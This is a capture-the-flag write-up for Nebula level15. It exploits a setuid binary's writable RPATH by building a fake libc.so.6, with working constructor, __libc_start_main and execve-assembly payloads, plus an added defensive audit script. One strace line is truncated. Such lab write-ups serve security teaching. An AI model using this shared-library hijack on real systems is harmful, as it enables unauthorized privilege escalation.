Linux Dynamic Link Library Hijacking Vulnerability
1. Description
Nebula is a virtual machine for practising privilege escalation on Linux. Its 15th level, level15, provides a vulnerable setuid program, flag15:
sh-4.2$ ls -l
total 7
-rwsr-x--- 1 flag15 level15 7161 2011-11-20 21:22 flag15
sh-4.2$ whoami
level15
The task is to exploit the setuid program to escalate from level15 to flag15 and execute /bin/getflag.
2. Vulnerability Discovery
This is a classic dynamic link library hijacking challenge. First, observe what flag15 does at startup with strace:
execve("./flag15", ["./flag15"], [/* 19 vars */]) = 0
brk(0) = 0x880e000
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
5/i686/sse2/cmov/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory)
stat64("/var/tmp/flag15/i686/sse2/cmov", 0xbfe0f594) = -1 ENOENT (No such file or directory)
open("/var/tmp/flag15/i686/sse2/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory)
stat64("/var/tmp/flag15/i686/sse2", 0xbfe0f594) = -1 ENOENT (No such file or directory)
open("/var/tmp/flag15/i686/cmov/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory)
stat64("/var/tmp/flag15/i686/cmov", 0xbfe0f594) = -1 ENOENT (No such file or directory)
open("/var/tmp/flag15/i686/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory)
stat64("/var/tmp/flag15/i686", 0xbfe0f594) = -1 ENOENT (No such file or directory)
open("/var/tmp/flag15/sse2/cmov/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory)
stat64("/var/tmp/flag15/sse2/cmov", 0xbfe0f594) = -1 ENOENT (No such file or directory)
open("/var/tmp/flag15/sse2/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory)
stat64("/var/tmp/flag15/sse2", 0xbfe0f594) = -1 ENOENT (No such file...
open("/var/tmp/flag15/libc.so.6", O_RDONLY) = 3
...
exit_group(63) = ?
The program looks for a shared library named libc.so.6 under /var/tmp/flag15, and /var/tmp is writable by the current user (level15). We can therefore place a customized libc.so.6 in that directory for flag15 to load.
Checking the ELF headers of flag15 confirms that it depends on libc.so.6 and was linked with an RPATH of /var/tmp/flag15, which tells the dynamic linker to search that directory for shared libraries at run time. Unlike LD_PRELOAD and LD_LIBRARY_PATH, which the loader ignores for setuid programs, the RPATH is embedded in the binary itself and is honored even when flag15 runs setuid.
sh-4.2$ objdump -p /home/flag15/flag15
/home/flag15/flag15:     file format elf32-i386

Program Header:
    PHDR off    0x00000034 vaddr 0x08048034 paddr 0x08048034 align 2**2
         filesz 0x00000120 memsz 0x00000120 flags r-x
  INTERP off    0x00000154 vaddr 0x08048154 paddr 0x08048154 align 2**0
         filesz 0x00000013 memsz 0x00000013 flags r--
    LOAD off    0x00000000 vaddr 0x08048000 paddr 0x08048000 align 2**12
         filesz 0x000005d4 memsz 0x000005d4 flags r-x
    LOAD off    0x00000f0c vaddr 0x08049f0c paddr 0x08049f0c align 2**12
         filesz 0x00000108 memsz 0x00000110 flags rw-
 DYNAMIC off    0x00000f20 vaddr 0x08049f20 paddr 0x08049f20 align 2**2
         filesz 0x000000d0 memsz 0x000000d0 flags rw-
    NOTE off    0x00000168 vaddr 0x08048168 paddr 0x08048168 align 2**2
         filesz 0x00000044 memsz 0x00000044 flags r--
EH_FRAME off    0x000004dc vaddr 0x080484dc paddr 0x080484dc align 2**2
         filesz 0x00000034 memsz 0x00000034 flags r--
   STACK off    0x00000000 vaddr 0x00000000 paddr 0x00000000 align 2**2
         filesz 0x00000000 memsz 0x00000000 flags rw-
   RELRO off    0x00000f0c vaddr 0x08049f0c paddr 0x08049f0c align 2**0
         filesz 0x000000f4 memsz 0x000000f4 flags r--

Dynamic Section:
  NEEDED      libc.so.6
  RPATH       /var/tmp/flag15
  INIT        0x080482c0
  FINI        0x080484ac
  GNU_HASH    0x080481ac
  STRTAB      0x0804821c
  SYMTAB      0x080481cc
  STRSZ       0x0000005a
  SYMENT      0x00000010
  DEBUG       0x00000000
  PLTGOT      0x08049ff4
  PLTRELSZ    0x00000018
  PLTREL      0x00000011
  JMPREL      0x080482a8
  REL         0x080482a0
  RELSZ       0x00000008
  RELENT      0x00000008
  VERNEED     0x08048280
  VERNEEDNUM  0x00000001
  VERSYM      0x08048276

Version References:
  required from libc.so.6:
    0x0d696910 0x00 02 GLIBC_2.0
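As an added check that is not part of the original write-up, the following POSIX shell script automates what the strace and objdump steps above found by hand: it reads DT_RPATH/DT_RUNPATH entries from readelf -d output, splits them into directories, and reports for each one whether the current user can write into it, or whether it does not exist but could be created because its nearest existing ancestor is writable (the /var/tmp/flag15 situation). The sample readelf line in the comments is constructed; readelf, awk and find are assumed to be available, and the classification must be run as the unprivileged user being assessed.

```shell
#!/bin/sh
# Added example: audit setuid/setgid binaries for attacker-controllable
# RPATH/RUNPATH directories. Not part of the original write-up.

# Read `readelf -d` output on stdin and print every directory named in a
# DT_RPATH or DT_RUNPATH entry, one per line. A constructed sample line:
#   0x0000000f (RPATH)   Library rpath: [/var/tmp/flag15:/opt/lib]
# glibc treats an empty element (e.g. "/opt/lib:" or "::") as the current
# directory, so such elements are reported as ".".
rpath_dirs() {
    awk '/\((RPATH|RUNPATH)\)/ {
        sub(/.*\[/, ""); sub(/\].*/, "")
        n = split($0, parts, ":")
        for (i = 1; i <= n; i++) print (parts[i] == "" ? "." : parts[i])
    }'
}

# Classify one search directory from the point of view of the current user:
#   dst        contains a dynamic string token such as $ORIGIN; review by hand
#   writable   the directory exists and we can write into it
#   creatable  it does not exist, but its nearest existing ancestor is
#              writable, so we can create it (as with /var/tmp/flag15)
#   ok         none of the above
# Run this as the unprivileged user you are assessing: root passes -w on
# everything, which makes the result meaningless.
classify_dir() {
    dir=$1
    case $dir in
        *'$'*) echo dst; return 0;;
    esac
    probe=$dir
    while [ ! -d "$probe" ]; do
        probe=$(dirname "$probe")
    done
    if [ ! -w "$probe" ]; then
        echo ok
    elif [ "$probe" = "$dir" ]; then
        echo writable
    else
        echo creatable
    fi
}

# Walk a directory tree, find setuid/setgid files and print one line per
# RPATH/RUNPATH directory: "<binary> <directory> <classification>".
audit_setuid_tree() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null |
    while read -r bin; do
        readelf -d "$bin" 2>/dev/null | rpath_dirs | while read -r dir; do
            echo "$bin $dir $(classify_dir "$dir")"
        done
    done
}

# Usage: sh audit_rpath.sh /home/flag15   (or / for the whole system)
if [ $# -gt 0 ]; then
    audit_setuid_tree "$1"
fi
```

On Nebula, running it against /home/flag15 as level15 would report /var/tmp/flag15 as creatable, which is exactly the condition exploited below; anything reported as writable or creatable for a setuid binary deserves the same treatment as flag15.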
3. Vulnerability Exploitation
What remains is to write our own libc.so.6 into /var/tmp/flag15, have flag15 load it in place of the real C library, and use the elevated privileges to run /bin/getflag.
First, hook a function that runs when flag15 starts. There are two choices: first, declare a function of our own with gcc's __attribute__((constructor)); the dynamic linker runs it when the library is loaded, before main, so the privilege escalation can be done there. Second, supply our own __libc_start_main, which the program's _start code calls to set up the process and invoke main, and put the escalation code in it.
Using the first method:
sh-4.2$ cat constructor.c
#include <stdio.h>
#include <stdlib.h>

/* Runs when the library is loaded, before flag15's main(). */
void __attribute__((constructor)) init()
{
    system("/bin/getflag");
}
Compile:
sh-4.2$ gcc -shared -fPIC -o libc.so.6 constructor.c
Method 2:
sh-4.2$ cat shell.c
#include <unistd.h>
#include <stdlib.h>

/* Replaces glibc's startup routine; flag15's _start calls this instead of main(). */
int __libc_start_main(int (*main) (int, char **, char **), int argc, char **argv,
                      void (*init) (void), void (*fini) (void),
                      void (*rtld_fini) (void), void *stack_end)
{
    system("/bin/getflag");
}
Compile:
sh-4.2$ gcc -shared -fPIC -o libc.so.6 shell.c
Either way we obtain a libc.so.6.
Then execute:
sh-4.2$ /home/flag15/flag15
/home/flag15/flag15: /var/tmp/flag15/libc.so.6: no version information available (required by /home/flag15/flag15)
/home/flag15/flag15: /var/tmp/flag15/libc.so.6: no version information available (required by /var/tmp/flag15/libc.so.6)
/home/flag15/flag15: /var/tmp/flag15/libc.so.6: no version information available (required by /var/tmp/flag15/libc.so.6)
/home/flag15/flag15: relocation error: /var/tmp/flag15/libc.so.6: symbol __cxa_finalize, version GLIBC_2.1.3 not defined in file libc.so.6 with link time reference
The message shows that a __cxa_finalize symbol is missing: our library references it (the "required by /var/tmp/flag15/libc.so.6" line), but at run time the name libc.so.6 resolves to our own file, which does not define it. Add an empty definition to both constructor.c and shell.c:
void __cxa_finalize(void *d) { }
Save the modified constructor.c as contructor1.c and compile again:
sh-4.2$ gcc -shared -fPIC -o libc.so.6 contructor1.c
Then execute:
sh-4.2$ /home/flag15/flag15
/home/flag15/flag15: /var/tmp/flag15/libc.so.6: no version information available (required by /home/flag15/flag15)
/home/flag15/flag15: /var/tmp/flag15/libc.so.6: no version information available (required by /var/tmp/flag15/libc.so.6)
/home/flag15/flag15: relocation error: /var/tmp/flag15/libc.so.6: symbol system, version GLIBC_2.0 not defined in file libc.so.6 with link time reference
The message shows that our library lacks the GLIBC_2.0 symbol version that flag15 was linked against, so we provide a version script at link time that defines it.
Compile and execute again:
sh-4.2$ cat version
GLIBC_2.0 {};
sh-4.2$ gcc -shared -fPIC -o libc.so.6 contructor1.c -Wl,--version-script=version
sh-4.2$ /home/flag15/flag15
/home/flag15/flag15: relocation error: /var/tmp/flag15/libc.so.6: symbol system, version GLIBC_2.0 not defined in file libc.so.6 with link time reference
The error persists, now about the system symbol itself. Our library calls system, but since the only libc.so.6 that ever gets loaded is our own (its NEEDED libc.so.6 entry resolves back to itself through the RPATH), the real glibc implementation is never available: every symbol that flag15 or our library uses must be defined inside our file. There are two ways to fix this. One is to link statically, so that the linker copies system and everything it depends on from libc.a into our library instead of leaving an undefined reference; the other is to write our own system function in assembly.
Method 1:
sh-4.2$ gcc -fPIC -shared -static-libgcc -Wl,--version-script=version,-Bstatic -o libc.so.6 contructor1.c
sh-4.2$ /home/flag15/flag15
You have successfully executed getflag on a target account
/home/flag15/flag15: relocation error: /home/flag15/flag15: symbol __libc_start_main, version GLIBC_2.0 not defined in file libc.so.6 with link time reference
The constructor has already run getflag by the time the loader fails to resolve __libc_start_main for flag15 itself, which contructor1.c does not define, so the final error does not matter.
Method 2:
sh-4.2$ cat shell.c
#include <unistd.h>

void __cxa_finalize(void *d) { }

void system(void);   /* our replacement, defined in system.s; takes no arguments */

int __libc_start_main(int (*main) (int, char **, char **), int argc, char **argv,
                      void (*init) (void), void (*fini) (void),
                      void (*rtld_fini) (void), void *stack_end)
{
    system();
}
sh-4.2$ cat system.s
.section .text
.globl system
system:
    mov  $getflag, %ebx     # ebx = path of the program to execute
    xor  %edx, %edx         # edx = envp = NULL
    push %edx               # argv must end with a NULL entry
    push %ebx               # argv[0] = "/bin/getflag"
    mov  %esp, %ecx         # ecx = argv
    mov  $11, %eax          # execve system call number on i386
    int  $0x80              # does not return on success
.section .data
getflag:
    .ascii "/bin/getflag\0"
sh-4.2$ gcc -shared -fPIC -o libc.so.6 shell.c system.s -Wl,--version-script=version
sh-4.2$ /home/flag15/flag15
You have successfully executed getflag on a target account
I personally think that the shellcode method is easier to understand than the static link library compilation method. At present, I have not figured out why the static link method solves the problem of the system function.